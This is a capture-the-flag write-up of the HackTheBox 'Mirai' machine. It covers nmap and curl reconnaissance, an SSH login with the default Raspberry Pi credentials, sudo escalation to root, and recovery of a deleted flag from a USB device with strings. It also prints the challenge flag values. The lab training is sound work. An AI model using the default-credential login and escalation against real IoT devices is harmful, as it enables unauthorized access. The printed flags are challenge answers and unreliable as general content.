Mirai

#Linux #Raspberry #Enumeration #IoT

Mirai is an easy-rated Linux machine from HackTheBox created by Arrexel. It was weird to find nothing at the start. In this machine, it was essential to research elements, mainly because of its IoT orientation. In the current post, my IP is 10.10.14.20, and the target’s IP is 10.129.210.160.

Gathering Information

First, we are going to start with checking if the machine is alive, then do the classic reconnaissance to get some general information about the target.

Local Terminal

ping -c 1 10.129.210.160

Pinging 10.129.210.160 with 32 bytes of data:
Reply from 10.129.210.160: bytes=32 time=145ms TTL=63
Reply from 10.129.210.160: bytes=32 time=146ms TTL=63
Reply from 10.129.210.160: bytes=32 time=147ms TTL=63
Reply from 10.129.210.160: bytes=32 time=151ms TTL=63

Ping statistics for 10.129.210.160:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 145ms, Maximum = 151ms, Average = 147ms

The TTL is 63, is close to 64 so it is a Linux Machine.

Local Terminal

nmap -p- --open -T5 -v -n 10.129.210.16 -oG AllPorts

Completed SYN Stealth Scan at 20:44, 49.81s elapsed (65535 total ports)
Nmap scan report for 10.129.210.160
Host is up (0.16s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
1501/tcp  open  sas-3
32400/tcp open  plex
32469/tcp open  unknown

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 50.30 seconds
           Raw packets sent: 68926 (3.033MB) | Rcvd: 68952 (2.758MB)

Local Terminal

nmap -sCV -p 22,53,80,1501,32400,32469 10.129.210.160 -oN WebScan

Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-07 20:53 Pacific SA Standard Time
Nmap scan report for 10.129.210.160
Host is up (0.16s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76 
| dns-nsid:
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1501/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Unauthorized
|_http-favicon: Plex
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here we have something inusual at the port 53, "dnsmasq 2.76", after some research about it, is just a Free Software Providing Domain Name System (DNS), with a big list of exploits, we will save it for later.

• Browser: http://10.129.210.160

The website is empty, let's try with Curl.

• Browser: http://10.129.210.160:32400/web/index.html

Nothing relevant.

Local Terminal

curl -s -X GET http://10.129.210.160 -I

HTTP/1.1 404 Not Found
X-Pi-hole: A black hole for Internet advertisements.
Content-type: text/html; charset=UTF-8
Content-Length: 0
Date: Mon, 08 May 2023 01:31:47 GMT
Server: lighttpd/1.4.35

By using curl we get a new relevant information, "Pi-hole", after some research, I found that is an application to block adds and trackers, and is designed to work in embed devices with network availability, like a Raspberry Pi.

The information about being a Raspberry Pi was pretty hidden, so it is worth to try the default credentials at the SSH port {user: pi} {password: raspberry}.

Local Terminal

ssh pi@10.129.210.160

We are in!

Exploit?

Target Terminal [Pi]

id

uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)

Look what we found, group 27(sudo), we can use sudo to login again and try the default password... again!

Target Terminal [Pi]

sudo su

The password wasn't necessary

Target Root

root@raspberrypi:/home/pi# cd /home/pi
root@raspberrypi:/home/pi# ls -l

total 1440
-rw-r--r-- 1 pi pi 1441764 Aug 13  2017 background.jpg
drwxr-xr-x 3 pi pi    4096 Aug 13  2017 Desktop
drwxr-xr-x 5 pi pi      99 Dec 13  2016 Documents
drwxr-xr-x 2 pi pi    4096 Aug 13  2017 Downloads
drwxr-xr-x 2 pi pi    4096 Aug 13  2017 Music
drwxr-xr-x 3 pi pi    4096 Aug 13  2017 oldconffiles
drwxr-xr-x 2 pi pi    4096 Aug 13  2017 Pictures
drwxr-xr-x 2 pi pi    4096 Aug 13  2017 Public
drwxr-xr-x 2 pi pi    1629 Dec 13  2016 python_games
drwxr-xr-x 2 pi pi    4096 Aug 13  2017 Templates
drwxr-xr-x 2 pi pi    4096 Aug 13  2017 Videos

A lot of folders to find the flag

Target Root

root@raspberrypi:/home/pi# find \-name user.txt
./Desktop/user.txt

root@raspberrypi:/home/pi# cat ./Desktop/user.txt
ff837707441b257a20e32199d7c8838d

And we have the first flag!

Privilege Escalation

Now we are going to locate the target,

Target Root

root@raspberrypi:/home/pi# cd /
root@raspberrypi:/# find \-name root.txt

./lib/live/mount/persistence/sda2/root/root.txt
./root/root.txt

It is located it two paths, let's try with the usual first and then the new one.

Target Root

cat ./root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Target Root

cat ./lib/live/mount/persistence/sda2/root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Same message, we have to find a way to find that USB stick, with df -h, used to see the disk usage in a list format of an Linux Machine.

Target Root

df -h
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  34% /
tmpfs           100M  8.8M   92M   9% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs           250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2       8.5G  2.8G  5.3G  34% /lib/live/mount/persistence/sda2
devtmpfs         10M     0   10M   0% /dev
tmpfs           250M  8.0K  250M   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           250M     0  250M   0% /sys/fs/cgroup
tmpfs           250M  8.0K  250M   1% /tmp
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick #HERE!
tmpfs            50M     0   50M   0% /run/user/999
tmpfs            50M     0   50M   0% /run/user/1000

I tried with cat first, bad idea, I find a lot of illegible information, and then with cd /dev/, there are a lot of files. At this point the best option is to execute it, if it fails or we can't do anything, we can analize the file with strings

Target Root

root@raspberrypi:/dev# /dev/sdb
bash: /dev/sdb: Permission denied

Target Root

root@raspberrypi:/dev# strings /dev/sdb
.DXd.DXd
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

Aaaaand... the flag is in clear text, that was random; the machine is done.